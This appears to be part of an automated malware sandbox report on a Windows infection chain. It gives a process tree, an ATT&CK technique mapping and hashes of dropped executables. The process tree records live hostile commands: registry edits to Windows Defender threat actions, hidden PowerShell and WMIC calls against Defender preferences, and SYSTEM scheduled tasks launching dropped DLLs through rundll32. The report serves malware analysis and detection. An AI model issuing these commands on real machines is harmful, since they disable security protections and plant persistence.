C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\dcUEDe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\nahGtSG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\JyRtQDJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\ubUNtnB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\eIPiUEf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\QmNNooz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 14:54:05 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\RDlwIuxU\aiQnwLv.dll\",#1 /sididwwqr 385118" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QdCYtDviHOrgqJLgZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 22042⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4236 -ip 42361⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\RDlwIuxU\aiQnwLv.dll",#1 /sididwwqr 3851181⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\RDlwIuxU\aiQnwLv.dll",#1 /sididwwqr 3851182⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1552 -ip 15521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5248 -ip 52481⤵
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Defense Evasion
Modify Registry
6Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Virtualization/Sandbox Evasion
2Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\JipyTrDkU\nahGtSG.xmlFilesize
2KB
MD5b80fcc93969500daa3883c3ab4123131
SHA171067364bd2df84cc608e150937be40eef431d9e
SHA2562661887f3dbd2b31c8704caf17b1b2b38da50c8165b0cefa34d19acca3c18b1f
SHA5124be7ec4b9db335b757c1f6fa11f9574310d7edbdc8df577894fe2249d675731f2b3ae1b1dc0d801a1d1d2e48d09ec8a81b076204e233702421e95233f2cd7ebc
-
C:\Program Files (x86)\YLgKyOFzWxOqC\QmNNooz.xmlFilesize
2KB
MD54cb42f6e3b1492726c45b38a8a9b35a0
SHA16f1f3849aa3afd383d66ac8b82d8204c12975f6a
SHA25639f78c39f8dcb3852040bf4ad4a88e4c4794407ae3ddcf3586300d93028c6b5a
SHA51277898be58738d43c991aeaed74d31c079ab7845fe1bb5d1fc36d672821e2e6b794705bf51f7b5cf09aba5430103f09b5255a779838b5118f0601051c263c21f4
-
C:\Program Files (x86)\krdeMCnRKomDOvwVunR\eIPiUEf.xmlFilesize
2KB
MD5efcb8d879f72da1edf86c2c776380275
SHA1b6095d95c16798d703c06252918bc8fcac446ab3
SHA256cd069475f5ab19075d8208b93d4b62fcc443f201338974f641e77b3fa3137143
SHA512b212743792b178a288db0d3f4e01af6f93252b5bd744d58c7e9c5e8320deb039ae0d2e49730f79563c8ec4358c54fc66394c7cb2f47e583e1ae765586e8635b7
-
C:\Program Files (x86)\tegRANPZONsU2\JyRtQDJ.xmlFilesize
2KB
MD585b4c641a7307e2caa630b6be597ff3b
SHA15190b771c072137f5cbd10edb995b4d57c593863
SHA25631e9e1f2265a356f22fed780582decdc242bb58b076ce94d3594abfd639edd2c
SHA5125d25b3b227cf1b9f17f5226edee59a386880a187abea9f4ceed313b33eb94d1b6eda2dcefedd156b71e97022a9c836bc1a7aba788c5cc5953b50f0c2ed345e61
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.5MB
MD5b72899d0d474fd348706a21f14b394ac
SHA141bda64c73dbce92c90a1171b6e5de3a852f5f1c
SHA25684b9c7dbe3f8543d60f60e8c19c24973daa5de9f8b300ec361b42d1847d1aff8
SHA512c19662581517ebd54d20b43947048a50ed05b1bb74715700ace2b1c2c26970b3995b923fa2d4de40b419927c2d41820823b79d9d4842ca8209ee5f384f715744
-
C:\ProgramData\fcblnlcRRSrBhAVB\ubUNtnB.xmlFilesize
2KB
MD5692032697449fc6c9852dfea661d6d63
SHA1bed6060973df3f49c7568c7f2e37bcf23a1bff64
SHA25698a8658394a505cc0aa927f34cda78181e01c33e8862380d61cad29cd4822173
SHA512686bd7b1efb64a79baa825aa8c77f140219bd9e819c599f885f05dcc8f0cd964b6561e238a65e08e684e3d1124ad562df508c5202fe166df5163c8e03c6219af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD540955f20e6bb579f94c85059ca6f0b43
SHA1a1c727937ee11b8e05e08b6fd9657135fbb44eef
SHA256b9e3d3d59c9cdb07f106d5b8e2fc0248691d0d1574a1a14aeb3f5b5085078245
SHA5124113b280ccfceedf029c9dedaa1daea1452d32580916dd3439f573bf140c9ac2d11f73c30c46e3db385579962544cf135f82c5a75c13af4ea5f4f60abc77cfbe
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
28KB
MD5f71686ab5972f608f2a78cabbcad1401
SHA1402452116d3c85d49ad7c8767b1f248750bd9271
SHA256b7df7fde369f7c3a374d4f31161c4f76f1418216a9b6dbcd633e42a077f38a53
SHA51291c6343bfb83c946670f8d5a65667d2023255148da858d3d4495498569dc85c257489d9af4f20df71875f16c4ce6c9511714d58d639675aceba35b186c0cf7b5
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD559d97011e091004eaffb9816aa0b9abd
SHA11602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA25618f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5a2f60a86989791cfa2144051ac3f6b48
SHA166bbe62808dbc72b897ffbdd98a698996a52b7d7
SHA256b9227189146310244e39f11540b32737f6e5eefff1660d9d081b49931e8273d4
SHA512ece05dc64b3f3ca47a23893f801c285bfef4b9d6c2eba7be3e6ed19f215b777f4454697aa87f660f7acdda524d8ff713386cff23f0f0378bb63b2816dbf6d277
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5d0d8f95d6522b09692fad6ed926129ad
SHA1abe4c739d0b7d6435851008fa3b9fe4a0f53f4e7
SHA25626da002a8e941c4052e3be15e1cceff981974ee662a91b7f2566b043474e76e8
SHA512886662c3df9a52cc21a5907128604e089049b4110e4996bcad366eafe9859118cd33848224e01558cb1090e1ac8e18e0f303d6f4b18b467171cbcc3a46c3a163
-
C:\Users\Admin\AppData\Local\Temp\[email protected]Filesize
656B
MD5184a117024f3789681894c67b36ce990
SHA1c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7
-
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.iniFilesize
830B
MD5e6edb41c03bce3f822020878bde4e246
SHA103198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA2569fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA5122d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exeFilesize
2.1MB
MD5208bd37e8ead92ed1b933239fb3c7079
SHA1941191eed14fce000cfedbae9acfcb8761eb3492
SHA256e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exeFilesize
304KB
MD584bf36993bdd61d216e83fe391fcc7fd
SHA1e023212e847a54328aaea05fbe41eb4828855ce6
SHA2568e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exeFilesize
518KB
MD5c4ffab152141150528716daa608d5b92
SHA1a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9
-
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exeFilesize
1.2MB
MD50b7e08a8268a6d413a322ff62d389bf9
SHA1e04b849cc01779fe256744ad31562aca833a82c1
SHA256d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA5123d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4
-
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exeFilesize
778KB
MD505b11e7b711b4aaa512029ffcb529b5a
SHA1a8074cf8a13f21617632951e008cdfdace73bb83
SHA2562aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa
SHA512dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff
-
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exeFilesize
579KB
MD5a991da123f34074f2ee8ea0d798990f9
SHA13988195503348626e8f9185747a216c8e7839130
SHA256fd42e618223f510d694c5fb2f8ecbc1a88cabf003bcf20da6227da30a1352a0f
SHA5121f958cacb820833ea8b5ac2d9ca7f596625e688f8f6b6e3ab6f27aa3b25b8c9e5b57e1eed532a8d2519da6c1b41492eb8ac930fc25eaf2be2f344c2f32e81a49
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeFilesize
1.8MB
MD5e233413f3e354acc52ee4975bb82d590
SHA140b53bf535aff421917c07e71d2885c67988038d
SHA256b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696
SHA5127519fc119212d7c690dd581c681f1688e5483d71d9b97e0e52e8fdbd39826e7c62180666d4d821b91bacbc2c6384c1de9a252cbfaf9f47ad9c129e720e41fa7f
-
C:\Users\Admin\AppData\Local\Temp\7zSCA31.tmp\Install.exeFilesize
6.3MB
MD57d1dd60c4b8fb4167645f7093801b6d9
SHA14ae1feb130e57f803ef00709419e6226b7c0e54d
SHA2561c62508e00e567d8f753734590a0a303acad2877681173cb4eed2e1a8409f3e9
SHA5127904bcaefe3d2f0e643f24a2e1eb6f0079e28d7df15f7be0fcd73ecc76680a9a677fe199d8a4d80d08144adbd4769d2a14eac2f933404aeeec05fe103429e872
-
C:\Users\Admin\AppData\Local\Temp\7zSD51E.tmp\Install.exeFilesize
6.6MB
MD50550ef6afda33ea1c1a231b939ca9b07
SHA1f74897166553b218e3a0869502ed036f175be9cd
SHA2568462d8b0433559e9afc2cd5de7bffe38fc6b82e3da9e79bdd33a85ab79fafaeb
SHA512329fa4ba439852740683dfb60070116fc459785d8a936e59aa4e55affe4697d66c5db844d154b30ab41913342fd5d51760f329cf30dc039387d0929026219a2e
-
C:\Users\Admin\AppData\Local\Temp\Tmp6627.tmpFilesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA5126fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0pqexas2.0lz.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\{53F4F872-5108-4f21-B556-F139D01F640A}.tmp\360P2SP.dllFilesize
824KB
MD5fc1796add9491ee757e74e65cedd6ae7
SHA1603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA5128fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3808065738-1666277613-1125846146-1000\76b53b3ec448f7ccdda2063b15d2bfc3_2397ee06-28fe-4eaa-8777-f7014368c353Filesize
2KB
MD5ddd390059fe7cb636281f974232efc05
SHA1abc315945698f733ecfbd615238fa63b6cd8182c
SHA256119a09081d7cdda81066f913e9d63b1b4408f8e83f512619019244360bdda6ae
SHA5127fe806a7530036a612bc01f0183efabd4fec579bdb3dfcd9f4f8b71ee69cc67fa4a5dc809f0658411d9bd3a33fe37b3d745a7ef730f6f2b5a753e3ee7f1b3640
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3808065738-1666277613-1125846146-1000\76b53b3ec448f7ccdda2063b15d2bfc3_2397ee06-28fe-4eaa-8777-f7014368c353Filesize
2KB
MD50158fe9cead91d1b027b795984737614
SHA1b41a11f909a7bdf1115088790a5680ac4e23031b
SHA256513257326e783a862909a2a0f0941d6ff899c403e104fbd1dbc10443c41d9f9a
SHA512c48a55cc7a92cefcefe5fb2382ccd8ef651fc8e0885e88a256cd2f5d83b824b7d910f755180b29eccb54d9361d6af82f9cc741bd7e6752122949b657da973676
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.jsFilesize
6KB
MD578deebf198df304b65b9b48dbf4fd5ad
SHA102c1f6cc171e3c4dc703549110880a5858ebe732
SHA2569df6a6f958b769c50ad126a0dced48f3fefeaa7bac956b9385fabafe7b9e6fbd
SHA512eefc490c83c732011398f1f350135fd4ef1afe26ecd79f1f16914fe180db0ce995e8d95145dd3ef1a660bbff3e1541d467b2ae4cb3e68f356f6816b4c051e5b7
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exeFilesize
408KB
MD5816df4ac8c796b73a28159a0b17369b6
SHA1db8bbb6f73fab9875de4aaa489c03665d2611558
SHA2567843255bc50ddda8c651f51347313daf07e53a745d39cc61d708c6e7d79b3647
SHA5127dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exeFilesize
304KB
MD515a7cae61788e4718d3c33abb7be6436
SHA162dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f
SHA256bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200
SHA5125b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45
-
C:\Users\Admin\Desktop\Microsoft Edge.lnkFilesize
2KB
MD5b22498c80287a90ac55078de0af5b1bf
SHA162172b84e4c85350bef3f88dd1a792a5f09b9f0d
SHA256061295ead1c809382d6887254d85cb90931c346f34c7bd31df61659ae7157509
SHA512642dc19b7b502125f009768df70a913b5fd59cfb8e42ef44d0fb61b21396b9d7b53b01fc3be7933336eb6bbc773577b42942ba8bc9c9f2b0e0fed32488738c0d
-
C:\Users\Admin\Pictures\5hN4UciOtFCyoPjG18IKIh76.exeFilesize
6.4MB
MD50e0938f8a7266056305bfedda7e1e78a
SHA12b4aa419957936fa6c6a2afbadb6bc30c1c4895d
SHA256b542adb1e853812925a1b5a1d1feac30125f05a9d7d0b1adce9ef4c6354c1066
SHA5124c430686f61843fc17c67fa8e78357f576620937137b7153bd2da4cc4f73a104130c221f24fb8060a767eac178bb6b319763b964eeffaa339b73cce444286490
-
C:\Users\Admin\Pictures\5jxmhsS7IIc71p4wij1InRzp.exeFilesize
7KB
MD577f762f953163d7639dff697104e1470
SHA1ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499
-
C:\Users\Admin\Pictures\8fdEuUbfYToYKhDcRYPeLZ0N.exeFilesize
405KB
MD5ef65292d26c79999f9cd88fc202e257e
SHA1bb1022e9d3d345f14db1f7e431d4d63259fa3ac2
SHA2564bd44fc79eff569312def70fb850c7f168e84d039f4d1d23b7a4927338476222
SHA5127df62adbecb10d5894741e85ee99df64949eb8a8300e352a5e9d8253b65ea58971f10d10a1f7a8dc0b99bfc87ab8ee511499a6b740cc996f8ec64e312209d02a
-
C:\Users\Admin\Pictures\BozZtwN2ch7zu3w6ykr1G4Nt.exeFilesize
7.3MB
MD508063da816c5db77ce64807c4ec2f7e8
SHA161ded712f36458ba6ffcec37edbf65d5927d2d92
SHA256dd08b1356c9b9bffe1ae9c254d28411890204e5b8fe1f9b9af0a7a3e5b6ed61e
SHA512df74cef767efde4711af6e40ef82801d91c4f1b5805fb0411235272a62fd08204d39153d4ae2056880d9d3ceaaae9c8e87254ea57d35a83bf501ac5be721c5f0
-
C:\Users\Admin\Pictures\bg76dZhV9E7e0SJaoBx5AJjE.exeFilesize
12.3MB
MD5acadbe83c09a7a9b8213a662eda12e93
SHA126a6e55076bc0602ff9060ac529528f3fc631986
SHA25642dd6aeee394e298646701ebe1fd611186ea4ee8c7e6383913db121444635944
SHA512a7ad3777e4a5ae9dd8dd09cff3a3ab498c6d2dc5b922407c48936225cb0c91430f75114f46b0a7b39046dc45c26221e199d33ff0bce105e05e903eef7fbdcd9f
-
C:\Users\Admin\Pictures\gLev4JkALuFVmMKAIsGAWyIf.exeFilesize
1.5MB
MD5cd4acedefa9ab5c7dccac667f91cef13
SHA1bff5ce910f75aeae37583a63828a00ae5f02c4e7
SHA256dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c
SHA51206fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1
-
C:\Users\Public\Desktop\Google Chrome.lnkFilesize
2KB
MD552e3f38557bc84b7845f1e9914b60276
SHA17f4d6ec636e5549e9b5e2b77c5efaa3d18dee03f
SHA256974c64e7af9e27200b7c273e789c7061d22ac283f7b14ee94afe289651a182e0
SHA5128e92f4e0f001413684cad06b72b10c6de8f9582e5f954ec536d303d8cd1d61dc4a7a3be34bc6b09e85ec1a03002b0a70efdc95b4aa7d99dec93975986ced931b
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD55315900105942deb090a358a315b06fe
SHA122fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA51277e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5073ffb03264b8d001a370e817f7d9ea1
SHA19e3d36f2a4b44efab3269f6024fbb344fe21384e
SHA256cc0a54bcf77f4be6a9505e46198432ec3cbcf6a0cb87ecc110c8d756bc1780c4
SHA512bf9bf3a3646044caf72805cb331a9b9e4859c5d2756b9c16198476e80fdaa851ecfc776849b4094cb0d366f1c31bea9f45e76a5bf637947c53135d99dc1505c0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD56b3f581d0c0785c38d3c568342b8de93
SHA13c264e81bae0475e13c46ddf350f55b1e631e2e1
SHA256eaaafe8b7b9318ef85b0c63d09a5eed97511f6545ea9ae8432868736ef5f2596
SHA512a0b311151171986659e857f074d6cf8ceb6c7b09010ca17307590b1b016a00200c6afcf3d8390b6b3ab5768db81dbd6f1e84f09bd7115249500231e107de6132
-
